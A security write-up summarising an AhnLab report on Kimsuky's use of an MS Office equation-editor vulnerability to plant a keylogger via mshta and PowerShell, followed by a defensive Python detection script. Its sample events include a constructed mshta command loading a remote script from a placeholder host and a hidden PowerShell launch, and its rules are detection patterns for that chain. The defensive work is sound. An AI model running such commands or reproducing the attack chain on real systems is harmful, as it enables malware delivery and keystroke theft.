Exploiting the vulnerability of MS-Office formula editor to install a keylogger (Kimsuky)

  • AhnLab Security Intelligence Center (ASEC) has confirmed that the Kimsuky attack group has been distributing keylogger malware by exploiting a vulnerability (CVE-2017-11882) in the equation editor program (EQNEDT32.EXE) included in MS Office.
  • The attackers exploited the vulnerability to distribute the keylogger by using the mshta process to load a web page with an embedded malicious script.
  • The page accessed through mshta uses the filename “error.php” and appears to be inaccessible, showing only a “Not Found” message (as shown in Figure 2), but the malicious script is still executed.
  • The main actions of the malware include receiving and executing additional malicious code from the C2 (Query=50) via PowerShell commands, and creating a desktop.ini.bak file under the Users\Public\Pictures path.
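
The behaviour chain summarised above (equation editor spawning mshta, mshta loading a remote .php page, mshta spawning PowerShell, and a desktop.ini.bak drop under Users\Public\Pictures) maps directly onto process-creation and file-creation telemetry. The following is an added detection example written for this summary; it is not code from the ASEC report. The sample events are constructed, Sysmon-style records, and the field names, rule names and the example.invalid URL are assumptions.

```python
"""Detection rules for the Kimsuky CVE-2017-11882 -> mshta -> PowerShell chain.

Added example (not from the ASEC report). The events below are constructed
to mimic Sysmon-style process-creation (type "process") and file-creation
(type "file") records; field names, rule names and hosts are assumptions.
"""
import re
from typing import Callable, Dict, List

Event = Dict[str, str]

# Constructed sample telemetry: one benign Office/equation-editor launch, the
# suspicious chain described in the report, and one benign file event.
SAMPLE_EVENTS: List[Event] = [
    {"id": "1", "type": "process",
     "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": "EQNEDT32.EXE -Embedding"},
    {"id": "2", "type": "process",
     "parent": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/error.php"},          # hypothetical host
    {"id": "3", "type": "process",
     "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -NoProfile -Command <stage2-placeholder>"},
    {"id": "4", "type": "file",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\Public\Pictures\desktop.ini.bak"},
    {"id": "5", "type": "file",
     "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\alice\Pictures\desktop.ini"},
]


def _base(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_eqnedt32_spawns_child(ev: Event) -> bool:
    # The equation editor has no business launching other processes.
    return ev["type"] == "process" and _base(ev["parent"]) == "eqnedt32.exe"


def rule_mshta_loads_remote_php(ev: Event) -> bool:
    # mshta pulling an http(s) .php page is the loader stage in the report.
    return (ev["type"] == "process" and _base(ev["image"]) == "mshta.exe"
            and bool(re.search(r"https?://\S+\.php\b", ev["cmdline"], re.I)))


def rule_mshta_spawns_powershell(ev: Event) -> bool:
    # The remote script hands off to PowerShell to fetch the next stage.
    return (ev["type"] == "process" and _base(ev["parent"]) == "mshta.exe"
            and _base(ev["image"]).startswith("powershell"))


def rule_desktop_ini_bak_in_public_pictures(ev: Event) -> bool:
    # The keylogger artefact named in the report.
    return (ev["type"] == "file"
            and re.search(r"\\users\\public\\pictures\\desktop\.ini\.bak$",
                          ev["target"], re.I) is not None)


RULES: Dict[str, Callable[[Event], bool]] = {
    "eqnedt32_spawns_child": rule_eqnedt32_spawns_child,
    "mshta_loads_remote_php": rule_mshta_loads_remote_php,
    "mshta_spawns_powershell": rule_mshta_spawns_powershell,
    "desktop_ini_bak_in_public_pictures": rule_desktop_ini_bak_in_public_pictures,
}


def detect(events: List[Event]) -> Dict[str, List[str]]:
    """Return {rule_name: [event ids that matched]} for every rule that fired."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(ev["id"])
    return hits


def chain_detected(events: List[Event]) -> bool:
    """True when both the mshta loader and its PowerShell child are seen,
    i.e. the full chain rather than a single noisy indicator."""
    return {"mshta_loads_remote_php", "mshta_spawns_powershell"} <= set(detect(events))


if __name__ == "__main__":
    for rule, ids in detect(SAMPLE_EVENTS).items():
        print(f"{rule}: events {ids}")
    print("full chain:", chain_detected(SAMPLE_EVENTS))
```

Each rule is kept independent so it can be tuned separately: the parent-process rule on EQNEDT32.EXE and the desktop.ini.bak path are near-zero-noise on most fleets, while the mshta and PowerShell rules benefit from the chain correlation in `chain_detected` to avoid alerting on legitimate HTA use.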

https://asec.ahnlab.com/ko/66135/